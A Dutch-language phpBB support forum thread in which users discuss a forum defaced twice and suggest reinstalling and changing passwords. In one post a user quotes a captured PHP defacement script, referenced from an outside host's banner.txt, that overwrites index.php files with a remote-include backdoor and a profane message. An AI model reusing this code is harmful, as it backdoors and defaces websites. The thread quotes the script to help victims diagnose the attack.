Pagina 1 van 2

Forum (weer) gehacked

Geplaatst: 22 dec 2005, 19:43
door suzzette
Support template:
  • Wat is het probleem? Forum is voor de 2e maal gehacked
    Wanneer ontstond het probleem? Deze avond
    Adres van je forum: http://www.scrapbooknederlan.com/phpBB2/phpBB2/
    Geïnstalleerde mods:album mod
    Huidige template:
    phpBB versie: 2.0.18
    Heb je onlangs een mod of stijl geïnstalleerd? nee
    Heb je gezocht naar een antwoord?ja, en nog steeds bezig.
Na de eerste keer gehacked te zijn hebben we het probleem opgelost door enkele files weer opnieuw te uploaden waardoor de 'currupte files' zijn vervangen door de goeie. Maar nu werkt dit niet meer krijgen we het niet voor elkaar om alles weer bij het oude te krijgen.

Geplaatst: 22 dec 2005, 20:00
door Paul

Gehackt

Geplaatst: 22 dec 2005, 20:03
door Gamemaniak
Als je dat gedaan hebt, zou ik je forum wat extra beveiligen.... :D

Re: Gehackt

Geplaatst: 22 dec 2005, 20:06
door Paul
Gamemaniak schreef:Als je dat gedaan hebt, zou ik je forum wat extra beveiligen.... :D
Ik vermoed dat hun precies zullen zeggen wat je precies moet doen, en ook hoe je het nogmaals kan voorkomen :)

Beveiliging

Geplaatst: 22 dec 2005, 20:09
door Gamemaniak

Geplaatst: 22 dec 2005, 21:06
door suzzette
daar staat dat het niet kan met de nieuwste versie en die gebruiken wij.

dit staat er op:
*beep* YOU 0X1FE AND ALL PEOPLE IN UR CHANNEL ;) *beep* BOTS, *beep* BOXTALK HOPE ALL U LAMERS GET BUSTED

SOON I OWN U ALL!!!


Credits to sirh0t, nico (pussy licker) and phpbb

en als ik ge ftp'd heb doet hij het even maar prompt een paar minuten later doet hij het weer niet meer.

Geplaatst: 23 dec 2005, 15:39
door YorickB
2.0.18 gehackt :S?

Naja, iig kan je ook opnieuw instaleren :)

Link

Geplaatst: 23 dec 2005, 15:48
door Gamemaniak
Trouwens de link naar je forum klopt niet het is: http://www.scrapbooknederland.com/phpBB2/index.php

Geplaatst: 23 dec 2005, 16:19
door Derky
*beep* YOU 0X1FE AND ALL PEOPLE IN UR CHANNEL ;) *beep* BOTS, *beep* BOXTALK HOPE ALL U LAMERS GET BUSTED

SOON I OWN U ALL!!!


Credits to sirh0t, nico (pussy licker) and phpbb
Hoe kan de index.php zo drastisch worden aangepast. :? :?

Ze hebben er al aardig wat gehad...

Geplaatst: 23 dec 2005, 16:50
door Bee
Ander controlepaneel wachtwoord, ander account wachtwoord, ander FTP wachtwoord, ander Database wachtwoord. Allemaal dingen die je zal moeten veranderen.

Gehacked

Geplaatst: 23 dec 2005, 16:54
door Gamemaniak
Derky:
Hoe kan de index.php zo drastisch worden aangepast.
Ik denk dat er een ander bestand is opgezet, dat kan haast niet anders :?

Re: Gehacked

Geplaatst: 23 dec 2005, 16:59
door Derky
Gamemaniak schreef:Derky:
Hoe kan de index.php zo drastisch worden aangepast.
Ik denk dat er een ander bestand is opgezet, dat kan haast niet anders :?
Maar hoe?
Ze hebben toch geen FTP toegang. :?

Gehackt

Geplaatst: 23 dec 2005, 17:03
door Gamemaniak
Ze hebben wel ftp toegang anders kunnen, hij of zij dit niet doen, ze
hebben alleen niet op een legale manier toegang tot de server. Trouwens
alles kan... :?

Geplaatst: 23 dec 2005, 17:04
door Toad
Die kunnen ze altijd hacken...

Gehackt

Geplaatst: 23 dec 2005, 17:04
door Gamemaniak
Natuurlijk, zoals ik al zij alles kan, niet alles mag :?

Geplaatst: 23 dec 2005, 18:26
door YorickB
Hoe kan dit noumogelijk zijn met phpbb 2.0.18?

Geplaatst: 23 dec 2005, 18:29
door Paul
Dat kan mischien wel ja, verder ga ik daar niet op in :), kan ook dat hij/zij gewoon niet goed heeft geupdated.

Geplaatst: 23 dec 2005, 18:32
door YorickB
Staat duidelijk in de support template dat het 2.0.18 is. Laat dit iig even aan het phpbb team zien, maybe is er wel weer een bugje :)!

Geplaatst: 23 dec 2005, 19:55
door DS9
Zo te zien hebben ze ook mij geprobeert te hacken maar dat was niet gelukt .

In mijn Worm & Exploit Logfile staat een hackstring (of hoe dat ook mag heten) met een verwijzing naar de boodschap die ze achter laten.

Namelijk: http://dotnet2683.combell.net/banner.txt
<?



//THIS SCRIPT WILL FIX THE BUG IN THE UNPATCHED PHPBB!!!
//ADMIN IF YOU READ THIS PLEASE FIX YOUR PHPBB
//DON'T WORRY!!! WE WILL FIX IT FOR YOU
//(C) 2006 PHPBB SIRH0T SEC.
//*beep* 0X1FE

//CREDITS TO : SIRH0T FOR SHARING HIS BOT WITH ME
//HE JUST WANT...
//MSG TO ALL KIDDIES NOW U CAN HAVE IT PUT IT IN YOUR ASS :) I OWNED MANY BOXES WITH THIS SCRIPT I EVEN SHARED WITH PEOPLE WHO ARE REALY LAME


//JUST BACKDOORING UR SHIT AND LEAVE A MSG


$index=fopen("index.php","w");
fwrite($index,"<? error_reporting(0);ini_set('max_execution_time',0); include(\$*beep*_eric) ?><title>DEFACED BY BILLGATES</title> *beep* YOU 0X1FE AND ALL PEOPLE IN UR CHANNEL ;) *beep* BOTS, *beep* BOXTALK HOPE ALL U LAMERS GET BUSTED<BR><BR>SOON I OWN U ALL!!!<br><br><center>Credits to sirh0t, nico (pussy licker) and phpbb</center>");
fclose($index);

$index2=fopen("../index.php","w");
fwrite($index2,"<? error_reporting(0);ini_set('max_execution_time',0); include(\$*beep*_eric) ?><title>DEFACED BY UNL0CK</title> *beep* YOU 0X1FE AND ALL PEOPLE IN UR CHANNEL ;) *beep* BOTS, *beep* BOXTALK HOPE ALL U LAMERS GET BUSTED<BR><BR>SOON I OWN U ALL!!!<br><br><center>Credits to sirh0t, nico (pussy licker) and phpbb</center>");
fclose($index2);
(ik zal de hele string maar niet posten :) )

Geplaatst: 23 dec 2005, 19:57
door Paul
Neem in ieder geval op met technie micheal op phpbbcom, zoals daar in het topic staat!